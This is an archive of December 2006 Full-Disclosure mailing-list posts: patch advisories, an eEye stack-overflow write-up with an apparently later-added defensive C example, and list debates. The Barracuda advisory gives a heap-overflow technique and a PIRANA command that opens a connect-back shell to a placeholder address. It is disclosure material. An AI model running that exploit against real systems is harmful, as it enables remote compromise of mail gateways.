[Full-disclosure] CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Undocumented Features
(The following pre-advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Undocumented_Features.pdf )

CYBSEC S.A.
www.cybsec.com

Pre-Advisory Name: SAP Internet Graphics Service (IGS) Undocumented Features

Vulnerability Class: Undocumented Features

Release Date: 12/05/2006

Affected Applications:
* SAP IGS 6.40 Patchlevel = 15
* SAP IGS 7.00 Patchlevel = 3

Affected Platforms:
* AIX 64 bits
* HP-UX on IA64 64bit
* HP-UX on PA-RISC 64bit
* Linux on IA32 32bit
* Linux on IA64 64bit
* Linux on Power 64bit
* Linux on x86_64 64bit
* Linux on zSeries 64bit
* OS/400 V5R2M0
* Solaris on SPARC 64bit
* TRU64 64bit
* Windows Server on IA32 32bit
* Windows Server on IA64 64bit
* Windows Server on x64 64bit

Local / Remote: Remote

Severity: Medium

Author: Mariano Nuñez Di Croce

Vendor Status:
* Confirmed, update released.

Reference to Vulnerability Disclosure Policy:
http://www.cybsec.com/vulnerability_policy.pdf

Product Overview:
The IGS provides a server architecture where data from an SAP System or other sources can be used to generate graphical or non-graphical output. It is important to note that IGS is installed and activated by default with the Web Application Server (versions = 6.30).

Vulnerability Description:
Undocumented features have been discovered in the SAP IGS service, some of which may signify security risks.

Technical Details:
Technical details will be released three months after publication of this pre-advisory. This was agreed upon with SAP to allow their customers to upgrade affected software prior to the technical knowledge being publicly available.

Impact:
Successful exploitation of this vulnerability allows remotely shutting down the SAP IGS service, accessing configuration files and performing unauthorized actions over the service deployment.

Solutions:
SAP has released patches that disable the default-enabled access to the service HTTP interface. Besides, some commands have been disabled. Affected customers should apply the patches immediately. More information can be found in SAP Notes 959358 and 965201.

Vendor Response:
* 06/02/2006: Initial Vendor Contact.
* 06/09/2006: Vendor Confirmed Vulnerability.
* 07/03/2006: Vendor Releases Update for version 6.40.
* 07/13/2006: Vendor Releases Update for version 7.00.
* 10/08/2006: Vendor Confirmed Solution.
* 12/05/2006: Pre-Advisory Public Disclosure.

Special Thanks:
Thanks go to Carlos Diaz and Victor Montero.

Contact Information:
For more information regarding the vulnerability feel free to contact the author at mnunez {at} cybsec.com. Please bear in mind that technical details will be disclosed to the general public three months after the release of this pre-advisory.

For more information regarding CYBSEC: www.cybsec.com

(c) 2006 - CYBSEC S.A. Security Systems

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1228-1] New elinks packages fix arbitrary shell command execution
Debian Security Advisory DSA 1228-1                    [EMAIL PROTECTED]
http://www.debian.org/security/                        Moritz Muehlenhoff
December 5th, 2006                                     http://www.debian.org/security/faq

Package: elinks
Vulnerability : insufficient escaping
Problem-Type : remote
Debian-specific: no
CVE ID : CVE-2006-5925
Debian Bug : 399188

Teemu Salmela discovered that the elinks character mode web browser performs insufficient sanitising of smb:// URIs, which might lead to the execution of arbitrary shell commands.

For the stable distribution (sarge) this problem has been fixed in version 0.10.4-7.1.

For the upcoming stable distribution (etch) this problem has been fixed in version 0.11.1-1.2.

For the unstable distribution (sid) this problem has been fixed in version 0.11.1-1.2.

We recommend that you upgrade your elinks package.

Upgrade Instructions

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
[Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
Flashing the bios on Acer Aspire 5102WLMi will erase all passwords previously set. This is obviously a bug! All passwords should not be wiped out with a bios flash (or at least they weren't on a Dell). Or, if they are, it should be stated up front so the passwords can be set again once the bios is updated.

https://www.synapsenow.com/synapse/data/7117/documents/AS31-51-5110_Flash_v200.zip

If you forget the bios password, they require the computer to be mailed to them; then they charge $100USD (citing labor security). The workaround they don't tell you about is to download the bios flasher and update your bios.

I tried contacting Acer about this bug and could not reach (was not transferred) the proper people; I've had teeth pulled that went better than trying to inform Acer.
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
On 12/5/06, richard cassidy [EMAIL PROTECTED] wrote:
> Flashing the bios on Acer Aspire 5102WLMi will erase all passwords previously set. This is obviously a bug! All passwords should not be wiped out with a bios flash (or at least they weren't on a Dell). Or, if they are, it should be stated up front so the passwords can be set again once the bios is updated.

Flashing the bios will erase all data. It's a feature, not a bug.

-- 
Tyop?
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
On Tue, 05 Dec 2006 22:37:36 +0100, Tyop? said:
> On 12/5/06, richard cassidy [EMAIL PROTECTED] wrote:
> > Flashing the bios on Acer Aspire 5102WLMi will erase all passwords previously set. This is obviously a bug! All passwords should not be wiped out with a bios flash (or at least they weren't on a Dell). Or, if they are, it should be stated up front so the passwords can be set again once the bios is updated.
>
> Flashing the bios will erase all data.

So the big question becomes - on an Acer, are the passwords stored in the BIOS flash memory (in which case, having them evaporate on a BIOS flash is reasonable), or are they on the NVRAM chip, in which case it's a bug/misfeature?
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
Tyop? wrote:
> Flashing the bios will erase all data. It's a feature, not a bug.

Bios passwords are stored on the CMOS, not the Rom itself, so no, it doesn't have to be.

On the other side, if you can flash your ROM, you have iopl(3) hence root privileges or at least enough privileges to get those passwords back (1). So that's really no big deal.

Regards,

endrazine-

(1) http://packetstorm.linuxsecurity.com/papers/password/Bios.Information.Leakage.txt

side note: I think you both know nothing. Sadly, giving non technical _opinions_ has become the main source of postings on this list.
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
endrazine wrote:

Just so you know: most Bios settings are stored on the Cmos, so if you can flash the Rom, you have ioperms at the very least on Cmos i/o ports, so you can reset the whole Cmos anyway.

endrazine-
[Full-disclosure] EEYE: Adobe Download Manager AOM Stack Buffer Overflow Vulnerability
eEye Research - http://research.eeye.com

Adobe Download Manager AOM Stack Buffer Overflow Vulnerability

Release Date: December 5, 2006
Date Reported: November 10, 2006
Severity: High (Code Execution)
Systems Affected: Adobe Download Manager 2.1.x and earlier

Overview:
eEye Digital Security has discovered a stack buffer overflow in Adobe Download Manager, a utility typically installed for the purpose of downloading Adobe software such as Adobe (Acrobat) Reader. By opening a malicious AOM file, a user's system may be compromised by arbitrary code within the file, which executes with the privileges of that user. A web-based attack conducted through Internet Explorer may succeed without the use of ActiveX or scripting, and without any additional user interaction other than viewing a web page, if the web server indicates a Content-Type of application/aom when serving up the malicious AOM file. In such a case, an .aom file extension is not required.

Technical Details:
AdobeDownloadManager.exe is responsible for extracting download instructions from AOM files, which are essentially XML with an appended CRC32 in decimal, and committing the instructions to the file %APPDATA%\dm.ini for later processing. For instance, opening the following AOM file:

<?aom encoding=UTF-8?>
<AdobeDownloadManager>
<AOM>
<DownloadRecord>
<url>WelcomeToMyHumbleAdobe</url>
</DownloadRecord>
</AOM>
</AdobeDownloadManager>3871966612

will generate the following lines in dm.ini:

[STARTUP]
Status=IncompleteDownload
[WelcomeToMyHumbleAdobe]
StoreID=0
TransactionID=0

When launched, whether or not it is supplied with an AOM file, AdobeDownloadManager.exe reads the entries from dm.ini and handles each described download according to its properties. It begins by reading a list of section names into a 400h-byte buffer using GetPrivateProfileStringA, then copies each section name into a 108h-byte stack buffer using strncpy with a length limit equal to the length of the section name string. The result is a relatively straightforward stack buffer overflow, with the only complication being the character restrictions.

It should be possible to uninstall Adobe Download Manager, or at least unassociate the AOM file extension and application/aom Content-Type in the registry, to defend against this vulnerability. Hopefully users who have been forced to install Adobe Download Manager realized its superfluousness and have already uninstalled it.

Protection:
Retina - Network Security Scanner has been updated to identify this vulnerability.
Blink - Unified Client Security has proactively protected from this vulnerability since its discovery.

Vendor Status:
Adobe has released a patch for this vulnerability which is available at http://www.adobe.com/products/acrobat/acrrmanager.html. The vendor bulletin is available at: http://www.adobe.com/support/security/bulletins/apsb06-19.html.

Credit: Derek Soeder

Related Links:
Retina - Network Security Scanner - Free Trial: http://www.eeye.com/html/products/retina/download/index.html
Blink - Unified Client Security Personal - Free For Home Use: http://www.eeye.com/html/products/blink/personal/download/index.html
Blink - Unified Client Security Professional - Free Trial: http://www.eeye.com/html/products/blink/download/index.html

Greetings:
Spooky action at a distance. Whoever else found that kernel race condition. Runner-up: Automatically Downloads Malware. (Thanks Daniel!)

Copyright (c) 1998-2006 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
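The strncpy misuse described in the advisory above, as an added example that is neither eEye's nor Adobe's code: the source-bounded copy beside a destination-bounded copy that rejects oversize section names, run over a constructed GetPrivateProfileString-style list. The 108h buffer size is from the advisory; the section names and the list are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Size of the stack buffer the advisory describes (108h bytes). */
#define SECTION_BUF 0x108

/* Vulnerable pattern from the advisory: strncpy is bounded by the length of
 * the SOURCE string, so it is no safer than strcpy. Kept here only for
 * contrast; this example never calls it with a name that does not fit. */
static void copy_section_unbounded(char *dst, const char *name)
{
    size_t n = strlen(name);
    strncpy(dst, name, n);          /* bound comes from the source, not dst */
    dst[n] = '\0';
}

/* Hardened form: bound by the DESTINATION and refuse names that do not fit
 * together with their terminator. Returns 1 when copied, 0 when rejected. */
static int copy_section_bounded(char *dst, size_t dstsz, const char *name)
{
    size_t n = strlen(name);
    if (dstsz == 0 || n >= dstsz)
        return 0;
    memcpy(dst, name, n + 1);
    return 1;
}

/* Walk a GetPrivateProfileString-style double-NUL-terminated list of section
 * names and count those the bounded copy would reject. */
static int count_oversize_sections(const char *list, size_t bufsz)
{
    int rejected = 0;
    for (const char *p = list; *p != '\0'; p += strlen(p) + 1)
        if (strlen(p) >= bufsz)
            rejected++;
    return rejected;
}

/* Constructed section name of 300 'A's: longer than SECTION_BUF. */
static const char *long_section_name(void)
{
    static char name[301];
    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = '\0';
    return name;
}

/* Constructed list: the benign name from the advisory's sample dm.ini plus
 * the oversize one, ended by the extra NUL GetPrivateProfileString uses. */
static const char *sample_section_list(void)
{
    static char list[512];
    const char *good = "WelcomeToMyHumbleAdobe";
    const char *bad = long_section_name();
    size_t off = 0;
    memcpy(list + off, good, strlen(good) + 1); off += strlen(good) + 1;
    memcpy(list + off, bad, strlen(bad) + 1);   off += strlen(bad) + 1;
    list[off] = '\0';                           /* second NUL ends the list */
    return list;
}

/* Try one name against a SECTION_BUF-sized stack buffer with the bounded copy. */
int try_section_name(const char *name)
{
    char buf[SECTION_BUF];
    return copy_section_bounded(buf, sizeof buf, name);
}

/* Count rejections over the constructed list. */
int oversize_in_sample(void)
{
    return count_oversize_sections(sample_section_list(), SECTION_BUF);
}

int main(void)
{
    char buf[SECTION_BUF];
    copy_section_unbounded(buf, "STARTUP");     /* safe only because it fits */
    printf("unbounded copy of a short name: %s\n", buf);
    printf("bounded copy of short name accepted: %d\n",
           try_section_name("WelcomeToMyHumbleAdobe"));
    printf("bounded copy of 300-byte name accepted: %d\n",
           try_section_name(long_section_name()));
    printf("oversize sections in sample list: %d\n", oversize_in_sample());
    return 0;
}
```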
[Full-disclosure] [ MDKSA-2006:224 ] - Updated xine-lib packages fix buffer overflow vulnerability
Mandriva Linux Security Advisory                         MDKSA-2006:224
http://www.mandriva.com/security/

Package : xine-lib
Date: December 5, 2006
Affected: 2007.0, Corporate 3.0

Problem Description:

Buffer overflow in the asmrp_eval function for the Real Media input plugin allows remote attackers to cause a denial of service and possibly execute arbitrary code via a rulebook with a large number of rulematches.

Updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172

Updated Packages:
Re: [Full-disclosure] Nmap Online
Why would you do this?

On 11/28/06 3:19 AM, David Matousek [EMAIL PROTECTED] wrote:
> Hello,
>
> For all Nmap fans, our group have implemented Nmap Online service. Its address is http://nmap-online.com/. The interface allows you to perform custom Nmap scans from our server with only a few limitations in the syntax. The service is free and can be used immediately, no registration is required. Please direct your questions and suggestions to our emails.
>
> Regards,
Re: [Full-disclosure] SSH brute force blocking tool
You have experience in disarming land mines with a hammer while you are stark naked? Now that's a real man's job!

On 11/27/06 4:20 PM, Brian Eaton [EMAIL PROTECTED] wrote:
> On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote:
> > There is no hocus pocus here. Look at /var/log/secure and find the term error retrieving and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny
>
> Parsing malicious input with shell commands is like disarming land mines with a hammer. And doing it as root? That's like disarming land mines with a hammer while you're stark naked.
>
> Regards,
> Brian
Re: [Full-disclosure] Nmap Online
On 12/5/06, Simon Smith [EMAIL PROTECTED] wrote:
> Why would you do this?

Well, for one, sometimes you need to do a port scan when you're not in front of a system that has nmap installed on it. I get a call about once every couple of months, why can't I get into my email server that's sitting behind a hardware router with a hole poked in it for port 110. Doing a port scan on the client's IP address ensures that either yes, the port is open or no, it's not. If it's open then I can proceed with my troubleshooting - if not, I know where to look for the problem.
[Full-disclosure] [USN-390-2] evince vulnerability
Ubuntu Security Notice USN-390-2                       December 06, 2006
evince vulnerability
CVE-2006-5864

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  evince 0.4.0-0ubuntu4.3

Ubuntu 6.06 LTS:
  evince 0.5.2-0ubuntu3.2

Ubuntu 6.10:
  evince 0.6.1-0ubuntu1.2

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

USN-390-1 fixed a vulnerability in evince. The original fix did not fully solve the problem, allowing for a denial of service in certain situations.

Original advisory details:

  A buffer overflow was discovered in the PostScript processor included in evince. By tricking a user into opening a specially crafted PS file, an attacker could crash evince or execute arbitrary code with the user's privileges.
Re: [Full-disclosure] Nmap Online
-----Original Message-----
From: Ed Carp [mailto:[EMAIL PROTECTED]
Sent: Wednesday, 6 December 2006 2:06 PM
To: full-disclosure@lists.grok.org.uk
Cc: David Matousek
Subject: Re: [Full-disclosure] Nmap Online

On 12/5/06, Simon Smith [EMAIL PROTECTED] wrote:
> Why would you do this?

Well, for one, sometimes you need to do a port scan when you're not in front of a system that has nmap installed on it. I get a call about once every couple of months, why can't I get into my email server that's sitting behind a hardware router with a hole poked in it for port 110. Doing a port scan on the client's IP address ensures that either yes, the port is open or no, it's not. If it's open then I can proceed with my troubleshooting - if not, I know where to look for the problem.

I don't wish to upset anyone but that answer has to be the craziest FIRST port of call approach I have seen used. I get plenty of those sorts of calls. I take about 30 seconds time on the phone for almost all of them. I say "Pull the power plug out of the router. Wait 10 seconds, plug it back in and wait another 10 seconds. OK, try now" and almost all of them report it works well. So why would I need and how could I use Nmap online to tell me the router went crazy and locked up?

Besides, wouldn't it be just as easy to use the Nmap sitting on my computer if I decided I needed to use it?

Greg.
[Full-disclosure] Barracuda Convert-UUlib library buffer overflow leads to remote compromise
Topic: Barracuda Convert-UUlib library buffer overflow leads to remote compromise
Announced: 2006-12-05
Product: Barracuda Spam Firewall
Vendor: http://www.barracudanetworks.com/
Impact: Remote shell access
Affected product: Barracuda Spam Firewall with firmware 3.3.15.026 AND virus definition 2.0.325
Credits: Jean-Sébastien Guay-Leroux
CVE ID: CVE-2005-1349

I. BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection:

* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service

II. DESCRIPTION

In 2005, Mark Martinec and Robert Lewis found a flaw in the Convert-UUlib library. Few details were published regarding this flaw.

After some research, I found that the flaw was in the part of the code where BinHex files were getting parsed. By supplying an invalid size for the resource fork or data fork in a BinHex's file header, it is possible to create a heap overflow.

By taking advantage of the sequential calls to free(), it's possible to overwrite more than 4 bytes. In fact, we can write a jmpcode in memory that will jump to one of our registers containing the location of our shellcode. By using this technique, the exploit will be much more reliable. You will only need to supply a return location address to the exploit code.

You do NOT need to have remote administration access (on port 8000) for successful exploitation.

For further information about the details of the bugs, check the exploit code.

III. IMPACT

Gain shell access to the remote Barracuda Spam Firewall.

IV. PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the Convert-UUlib vulnerability.

The version 0.3.1 of the PIRANA framework incorporates a new module to exploit the Convert-UUlib library bug. It contains three hardcoded offsets that should reliably exploit every Barracuda Spam Firewall with a firmware below 3.3.15.026 and virus definition below 2.0.325.

By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \
    -l 1.2.3.4 -p 1234

V. VERSIONS AFFECTED

This affects firmware releases before versions 3.3.15.026. This is no longer an issue with Barracuda's customers with current Energize Updates, running virus definition 2.0.325, released Nov. 29, 2006. It is recommended that Barracuda's customers upgrade to the latest generally available release.

VI. CREDITS

Mark Martinec and Robert Lewis found the original flaw in Convert-UUlib.

Jean-Sébastien Guay-Leroux conducted further research on the bug and produced an exploitation plugin for the PIRANA framework.

VII. REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1349

VIII. HISTORY

2005-04-26 : Bug is disclosed by Mark Martinec and Robert Lewis.
2006-08-?? : Convert-UUlib module exploit written for PIRANA.
2006-11-28 : Barracuda Networks is notified about the problem.
2006-11-28 : Barracuda Networks acknowledged the problem.
2006-11-29 : Barracuda Networks published a fix.
2006-12-05 : Advisory is disclosed to the public.
Re: [Full-disclosure] Nmap Online
On Wed, 6 Dec 2006, Greg wrote:

> I don't wish to upset anyone but that answer has to be the craziest FIRST port of call approach I have seen used. I get plenty of those sorts of calls. I take about 30 seconds time on the phone for almost all of them. I say "Pull the power plug out of the router. Wait 10 seconds, plug it back in and wait another 10 seconds. OK, try now" and almost all of them report it works well.

That is heavily target market specific... Whilst I offer the same line to some friends and family, others I wouldn't dare start there (out of respect - they've already done everything obvious before asking for help).

> Besides, wouldn't it be just as easy to use the Nmap sitting on my computer if I decided I needed to use it?

If only it was always that easy... I just moved, and whilst the ISP is the same, the CLEC is new - new lines, new IP, some newer software, etc. I need to verify *my* setup, so:

* my local nmap is useless
* my work boxen are heavily firewalled - even outbound
* my accounts elsewhere usually don't have nmap available to non-admins (and I shy from that role unless needed).

So... For me, this has been a great service, and I'm sure I'm not alone.

--
Rick Nelson
Life'll kill ya -- Warren Zevon
Then you'll be dead -- Life'll kill ya
Re: [Full-disclosure] Nmap Online
On 12/5/06, Greg [EMAIL PROTECTED] wrote:

> I don't wish to upset anyone but that answer has to be the craziest FIRST port of call approach I have seen used. I get plenty of those sorts of

Who said it was the first thing that was tried? And you just can't pull the plug on a router in a production shop.
[Full-disclosure] eEye's Zero-Day Tracker Launch
http://eeyeresearch.typepad.com/blog/
http://research.eeye.com/html/alerts/zeroday/index.html

> If something is reported as a non-exploitable bug, we'll make sure to exhaust the flaw for exploitability, as we have shown with the ASX Playlist and the ADODB.Connection ActiveX zero-day vulnerabilities.

Or.. FUD?

1.) Adobe ActiveX
http://research.eeye.com/html/alerts/zeroday/20061128.html

Although there was no supplied proof of concept for these vulnerabilities, releasing the method names as well as the fact that they are 'memory corruption' errors and 'could be exploited by attackers to take complete control of an affected system' without a vendor-supplied patch will put many Adobe users at risk.

And..

> Remote Code Execution: Yes

Now wait a second, I thought that you guys were going to "make sure to exhaust the flaw for exploitability"? Did you actually try this out that you can say Remote Code Execution is possible?

2.) ASX Playlist
http://research.eeye.com/html/alerts/zeroday/20061122.html

Now this is fun.

> Severity: High
> Remote Code Execution: Yes

> As a result, a two- or four-byte heap overflow is possible if the REF HREF URL features a protocol shorter than three characters (the length of "mms").

Ok. But wait, what's this sentence doing here:

> Exploitability due to the corruption of the adjacent heap block's header has not yet been demonstrated but is assumed likely.

So... you ASSUMED that it is likely, even though you can only have up to a 4-byte overwrite which does not overwrite the needed pointers in order to actually exploit this, yet you say "Yes" in Remote Code Execution?

trippin-out, noodles for long life!